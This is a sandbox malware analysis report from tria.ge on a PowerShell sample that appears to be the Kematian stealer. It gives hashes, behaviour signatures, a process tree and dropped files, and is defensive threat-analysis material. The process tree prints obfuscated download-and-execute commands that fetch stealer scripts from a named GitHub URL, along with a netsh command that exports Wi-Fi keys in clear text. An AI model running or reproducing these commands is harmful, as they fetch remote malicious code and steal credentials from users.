Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/07/2024, 01:04

General

  • Target

    18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358.ps1

  • Size

    72KB

  • MD5

    51299f3a266034e35d706a1d0aa5580b

  • SHA1

    3c9ef68f69b9f8c2941e9d765ae0ae8df9bfdf14

  • SHA256

    18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358

  • SHA512

    b125b9e91fd5b3516ed5218d47316a9f4c6f052ae7c4d517eae18abb8643f1145adf117eb2d852ee684e1ffef4d85c0aab33935cebc0effc11e3f160a5bb0b23

  • SSDEEP

    1536:F8SdVn5ahg5yYp6zdv/5l05Qo8l01zhwZPhZcLrJS7srHX6Cg:F8SdVn5Uwiv/5IQo8l01zhw5hUr9KCg

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\18382f6c7f8b52c779243c6cc7d4cbc51a95d31d40bc748bc2ec65c63219c358.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1856
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fh5qbbux\fh5qbbux.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5084
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CAD.tmp" "c:\Users\Admin\AppData\Local\Temp\fh5qbbux\CSC4A81311043EB4ECEA75E59D69BE83BC4.TMP"
        3⤵
          PID:3680
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
        2⤵
          PID:2776
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:2208
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
          2⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5088
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ip5rfkm\4ip5rfkm.cmdline"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:916
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3CB.tmp" "c:\Users\Admin\AppData\Local\Temp\4ip5rfkm\CSC54E56A0DF6484684AAFDF7169454B82F.TMP"
              4⤵
                PID:2696
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
            2⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            PID:4376
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bntuvrcs\bntuvrcs.cmdline"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2352.tmp" "c:\Users\Admin\AppData\Local\Temp\bntuvrcs\CSC301703BDED7A40D180657B6C29794BE0.TMP"
              3⤵
                PID:4624

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            589c3ec0702fd9e3920c1f07750a8960

            SHA1

            d3f542319a1e26561acd292c4145cfb15e1cdfda

            SHA256

            7f8ae15f939de3cd5849057a8d155f8bced914451fa512e009019c56305a2a33

            SHA512

            cda38ee434943e390e547271b55d4b81bbed17c0691212201b58ced6b2dccae0b52f4b610d4f643676dfd56a2e30022ed922b327363f1856cd4e7a74be34c9a4

          • C:\Users\Admin\AppData\Local\Temp\4ip5rfkm\4ip5rfkm.dll

            Filesize

            5KB

            MD5

            a8de6cd9f1f6bdcc7cf069f0a589edeb

            SHA1

            a31c335117408a09ecbcc429f1bdb800db4d6c5e

            SHA256

            42405d02e3450fc88c1e72500b83bd7f69b056baea7593e2bef79e43f63e257b

            SHA512

            7412138591efddcf79e6e27f01f663c9763f3e11f94ec8f6f484f327d8be2364a948f48ceadd5b87527bfe749636dea73febfbdcde11360aa79550e6437f03ba

          • C:\Users\Admin\AppData\Local\Temp\RES2352.tmp

            Filesize

            1KB

            MD5

            ce9e8c3077b5e1fed61ba47bf748307e

            SHA1

            a92592fd7d1b18d5581ca50756dd1a819e09d04d

            SHA256

            8d0df979cb53f5d18f254b61bf9e92b8ec02a6ab486a59896a66c9e01855686d

            SHA512

            a9493e5b64591e6529a366a7ee067d64fc12a641f3d160f9150abebcedaffe7e9230766b8c3e213a35187dd3da675efd02ccc8ec835d33128300ba5fd005f4b1

          • C:\Users\Admin\AppData\Local\Temp\RES9CAD.tmp

            Filesize

            1KB

            MD5

            05a84bf289408ae7c6bd3e4136f07f6f

            SHA1

            4d879255c158b0b9d785bbba09b031eead2c9c42

            SHA256

            b0db157509228219fb16dff85afe3a2a82000738276bf65232acb87e76d9f2d3

            SHA512

            ddf237f3cb7f8e9da5fcf3d2251a90ea160108829562d091d5283a968a78e25017fb4ab4b000c4a037b8750e71bb13e1b45f72c77bd433acc0150d8408030c58

          • C:\Users\Admin\AppData\Local\Temp\RESD3CB.tmp

            Filesize

            1KB

            MD5

            f02e097f9a72bad1f964c64fdfadcb95

            SHA1

            e04851eafbab6c9b9b6af982ad98d9e4d8494ddb

            SHA256

            aa4361ac5afee0b1fb9102a2f70330b3df488d5fe0f1baebca29e9df7a0318e4

            SHA512

            f2221c2c78eaf1fdec05cbc7436781184ada7202d1947eca4bf89fd533178aa0bb6c975c4532ee58fad722d965823d8a6dc0aab04855376f5213453b5f668abf

          • C:\Users\Admin\AppData\Local\Temp\_GB_RTDEQSAS_2024-07-05_UTC0.zip

            Filesize

            65KB

            MD5

            8f1ad238f03be923005c7dee2ae982d3

            SHA1

            2b59d56aa6e32eccb18a25aeec859ea63cec5adc

            SHA256

            6e53175ff34f0f74e27dbbe01e987406eb33862085b5703fd66e3fbae5b19cde

            SHA512

            ab04d179c94afe504bef125583fec0052b68e7e388184f06d780a9751e5f9e8e8bc29d71343a7db9fe145967d2239f915dc3613207fdddcd0f81858025d0ffdc

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rliearwh.4an.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\bntuvrcs\bntuvrcs.dll

            Filesize

            3KB

            MD5

            be8d9499edca49144aa479b8ebf1a57a

            SHA1

            7b3b1284f5434f00316ebcea8d76f2c0ec842ddf

            SHA256

            e595202b020e81ded7bd8d3c23a638cfd81e60f0a0eac2fb8c3d2083c0d8f25a

            SHA512

            8dd2f4a30319f4cbfa86bce3168fce5393231a845ed975ea5b26d6498a9ac79478b880e6686d8303d8e62924e5e88822bfbb24c7ce149c33a5d783ae7441d1d4

          • C:\Users\Admin\AppData\Local\Temp\cards.json

            Filesize

            4B

            MD5

            37a6259cc0c1dae299a7866489dff0bd

            SHA1

            2be88ca4242c76e8253ac62474851065032d6833

            SHA256

            74234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b

            SHA512

            04f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f

          • C:\Users\Admin\AppData\Local\Temp\fh5qbbux\fh5qbbux.dll

            Filesize

            3KB

            MD5

            56ca5f158db18dfcf6d2a56cfdd0baf1

            SHA1

            0bfb2bf6aa46fe977b552269218619b2382fcc18

            SHA256

            751fe865041510d0c5be81c7de4259884f803427c60529d6b0f9cbe24e6c4fa8

            SHA512

            120be44ccd6ff9f49e43a51e4e1920f6cb281042061b92883d9db853cbfca1a8b0b32a9375f1cfd9d18de8e766fe4435e0f167531a72d1b9edd837d562a2b8aa

          • C:\Users\Admin\AppData\Roaming\Kematian\GB-(RTDEQSAS)-(2024-07-05)-(UTC0)\DomainDetects\Edge.txt

            Filesize

            2B

            MD5

            81051bcc2cf1bedf378224b0a93e2877

            SHA1

            ba8ab5a0280b953aa97435ff8946cbcbb2755a27

            SHA256

            7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

            SHA512

            1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

          • \??\c:\Users\Admin\AppData\Local\Temp\4ip5rfkm\4ip5rfkm.0.cs

            Filesize

            4KB

            MD5

            2a829317f65fea84eb85cb2376fa9e21

            SHA1

            2f223ea8738f9989385e93b9c8cf0e8fc5e30700

            SHA256

            f99c46f447010a438586651fcdf9068394926247bf7656980fee066b2069fe8f

            SHA512

            a438c35327297431df19fe50683619f78ea0245bb8d3aa7553c376c365b927747d8cb8343fc2cfb4de884dad4eb6166589afc98eba385137bb3405998838ace0

          • \??\c:\Users\Admin\AppData\Local\Temp\4ip5rfkm\4ip5rfkm.cmdline

            Filesize

            712B

            MD5

            9d6f4cd89badc3257cc7254a159cf7a7

            SHA1

            e9e0e31fd150a14bcf3715fa99159cb303f6ee6d

            SHA256

            d632494718e4fb74251fbe082e522c0f00d5fa2e2a4e92b8b5baf9463bcb0690

            SHA512

            bbc53e99743ec73c1aa4144977584395f8680d6410b634ebf979e9f7c8ead48458a3ad869f1cee74ada360d4641a20b36151bf2cdad2de237e71962aec1ae1ec

          • \??\c:\Users\Admin\AppData\Local\Temp\4ip5rfkm\CSC54E56A0DF6484684AAFDF7169454B82F.TMP

            Filesize

            652B

            MD5

            c7e7b9be1edec54874030d0780df25f6

            SHA1

            8e3f96adc307007c3b33028837df690062b728a3

            SHA256

            24e550829544813c2d47df1c3eccf0d2a0af286374b8e9202983b6042fc27c9b

            SHA512

            8adde13c2a4f3d1ea21fcb99cf103b85941461ac37422dfc0f52d98a24c317ec53b01ca8dd774ef59e4a7e2b6d88917e5960fab9d4340df5ea83ce4ef6c7b01f

          • \??\c:\Users\Admin\AppData\Local\Temp\bntuvrcs\CSC301703BDED7A40D180657B6C29794BE0.TMP

            Filesize

            652B

            MD5

            451d862259e85b3e000d3177fb941ea0

            SHA1

            4f66a88c86bf8b3b16e5283ea59246169c4949c8

            SHA256

            d2d4ea6fd697f7712b162f3df8f0fe4e7979c3eabf7fb1474098b9fec5820167

            SHA512

            e55928882853c604be12454f70fdaadd6cb50b19bee23798e7e6c4d9fc241ef097fe9e17c2ef6419ebff60177b93eca63f692f9d2c5d4a3ba840be58b78878a5

          • \??\c:\Users\Admin\AppData\Local\Temp\bntuvrcs\bntuvrcs.0.cs

            Filesize

            321B

            MD5

            249ab1409c1ad0e025a82d513e4f7f12

            SHA1

            f38f701e2e6be38739f36d04586f90f39babf2ad

            SHA256

            9babf0e0294d1743f12c4fb3ddac50ca25c75accd223c4f1716d916f659c538c

            SHA512

            3abcdec5ed668a291dde15344368549174d2562196285a3f521613c7bd3b1ab80f189439b08e7c4f57c5269f6159aa154c0cc503df3640bfc51712635c3a12bc

          • \??\c:\Users\Admin\AppData\Local\Temp\bntuvrcs\bntuvrcs.cmdline

            Filesize

            369B

            MD5

            7e7646c74a530eb4c013edbae8c7017f

            SHA1

            6aa228a5ee9861adf14703f3b70e74e7be495659

            SHA256

            4cc43f8191e09a97b3988851422b11c6e1ba56e23b64a88b3acc34ce8861ec43

            SHA512

            db4c226fa9655182cedcab45766efa1c1d2a97e80d42a2bfb7bae74461919fa9344ca3155180754b0e4c565a913c725940b464842793f7516e1a5dedc4b20100

          • \??\c:\Users\Admin\AppData\Local\Temp\fh5qbbux\CSC4A81311043EB4ECEA75E59D69BE83BC4.TMP

            Filesize

            652B

            MD5

            77c3811d9a314c193fb6dc04c9eb105a

            SHA1

            7b34d62217ebd0c36d5792a0215d837413164313

            SHA256

            0860a854923184826f5bbda9e9a22ed4d7104194576fe57ed2b4d59b0fd02e09

            SHA512

            5bfd0964d18b09165dacf1884a7d3907e361d14b34827f8ced24b571be4d0f4e5dad309ed5e2a23e5da1db731246d0f2e4e3c4c671a250305a7180b17b8992bd

          • \??\c:\Users\Admin\AppData\Local\Temp\fh5qbbux\fh5qbbux.0.cs

            Filesize

            512B

            MD5

            a36c5dbd22147371b4ea6ffacb560fb6

            SHA1

            e7248cd6a49d3aae9439efdffaceeacad6a7c523

            SHA256

            fc874c6cbd59c24e83702e0cd6f301c4a929865687d8e0d041090a2bcd801a60

            SHA512

            256b2e0beea6305f21024d60acdb0dcc84c2da46824d1c0610a9a22fa0e8c1753271140db278baf26e260c381f13001be1e8c651b01a178ca0922a2ab1bf4361

          • \??\c:\Users\Admin\AppData\Local\Temp\fh5qbbux\fh5qbbux.cmdline

            Filesize

            369B

            MD5

            6aa770d21d0f67049aac19a40bfab1b8

            SHA1

            01073f43eb83192db753bb91e6fe31baf7f4f4e0

            SHA256

            90a978ec088c10a7b7eb5d106d04e3751fcf3eb64a38547b72b2bcfede18859a

            SHA512

            43255ba7e506b5c96d534ccaca02b6c6c4a9fdc799203edd99899a7a93a12a042f8206405b961399f8ad0f232f83bc274ddf9a44f6e2216fe30ff2ba452642d9

          • memory/1856-0-0x00007FFEADFE3000-0x00007FFEADFE5000-memory.dmp

            Filesize

            8KB

          • memory/1856-36-0x0000021829D70000-0x0000021829DB4000-memory.dmp

            Filesize

            272KB

          • memory/1856-29-0x0000021829E70000-0x000002182A032000-memory.dmp

            Filesize

            1.8MB

          • memory/1856-27-0x00007FFEADFE0000-0x00007FFEAEAA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1856-25-0x00000218298C0000-0x00000218298C8000-memory.dmp

            Filesize

            32KB

          • memory/1856-1-0x00000218295E0000-0x0000021829602000-memory.dmp

            Filesize

            136KB

          • memory/1856-37-0x000002182A440000-0x000002182A4B6000-memory.dmp

            Filesize

            472KB

          • memory/1856-72-0x00007FFEADFE3000-0x00007FFEADFE5000-memory.dmp

            Filesize

            8KB

          • memory/1856-73-0x00007FFEADFE0000-0x00007FFEAEAA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1856-74-0x00007FFEADFE0000-0x00007FFEAEAA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1856-11-0x00007FFEADFE0000-0x00007FFEAEAA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1856-28-0x00007FFEADFE0000-0x00007FFEAEAA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1856-94-0x0000021829DC0000-0x0000021829DD2000-memory.dmp

            Filesize

            72KB

          • memory/1856-95-0x0000021829D50000-0x0000021829D5A000-memory.dmp

            Filesize

            40KB

          • memory/1856-33-0x00007FFEADFE0000-0x00007FFEAEAA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1856-32-0x0000021829D30000-0x0000021829D54000-memory.dmp

            Filesize

            144KB

          • memory/1856-31-0x0000021829D30000-0x0000021829D5A000-memory.dmp

            Filesize

            168KB

          • memory/1856-30-0x000002182A570000-0x000002182AA98000-memory.dmp

            Filesize

            5.2MB

          • memory/1856-12-0x00007FFEADFE0000-0x00007FFEAEAA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1856-115-0x000002182A520000-0x000002182A528000-memory.dmp

            Filesize

            32KB

          • memory/4376-75-0x000002A4DF380000-0x000002A4DF74F000-memory.dmp

            Filesize

            3.8MB

          • memory/5088-59-0x0000024899E40000-0x0000024899E48000-memory.dmp

            Filesize

            32KB